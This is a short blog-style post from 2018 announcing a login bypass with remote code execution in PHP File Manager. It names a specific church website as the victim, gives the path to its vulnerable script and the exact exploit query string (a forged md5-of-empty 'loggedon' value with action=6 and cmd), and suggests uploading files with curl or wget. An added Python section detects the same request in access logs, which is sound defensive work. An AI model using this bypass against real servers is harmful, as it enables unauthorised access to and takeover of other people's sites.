Friday, December 14, 2018

PHP File Manager Remote Code Execution

PHP File Manager login bypass with remote code execution

PoC URLs:
victim: http://malayattoorchurch.com
bug: http://malayattoorchurch.com/gallery/phpfm.php
exploit:
?blockKeys[0]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd=
example:
http://malayattoorchurch.com/gallery/phpfm.php

You can upload your files with curl or wget
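
A defender-side check for the request shown above, as an added example that is not part of the original post: it scans web access log lines for the combination of `blockKeys`, `fm_self`, `loggedon` set to `d41d8cd98f00b204e9800998ecf8427e` (the MD5 of an empty string) and `action=6` with `cmd`. The log lines, paths, addresses and the two-indicator threshold are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# MD5 of the empty string: the "loggedon" value used in the request above.
EMPTY_MD5 = "d41d8cd98f00b204e9800998ecf8427e"

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def score_request(target):
    """Return the list of indicators found in one request target."""
    # keep_blank_values: the request above sends blockKeys[0] and cmd empty.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    keys = {k.lower(): v for k, v in query.items()}
    hits = []
    if any(k.startswith("blockkeys") for k in keys):
        hits.append("blockKeys supplied by client")
    if "fm_self" in keys:
        hits.append("fm_self supplied by client")
    if EMPTY_MD5 in (v.lower() for v in keys.get("loggedon", [])):
        hits.append("loggedon = md5('')")
    if "6" in keys.get("action", []) and "cmd" in keys:
        hits.append("action=6 with cmd")
    return hits

def scan(lines, threshold=2):
    """Yield (line_number, indicators) for entries with enough indicators."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = score_request(m.group(1))
        if len(hits) >= threshold:
            yield n, hits

# Constructed sample log lines (paths and addresses are made up).
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Dec/2018:10:01:02 +0000] "GET /files/phpfm.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [14/Dec/2018:10:01:09 +0000] "GET /files/phpfm.php?blockKeys%5B0%5D='
    '&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd= HTTP/1.1" 200 812',
    '198.51.100.4 - - [14/Dec/2018:10:02:00 +0000] "GET /shop/cart.php?action=6 HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Parameters sent in a POST body or a cookie do not appear in the access log, so this check only covers the GET form shown above.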
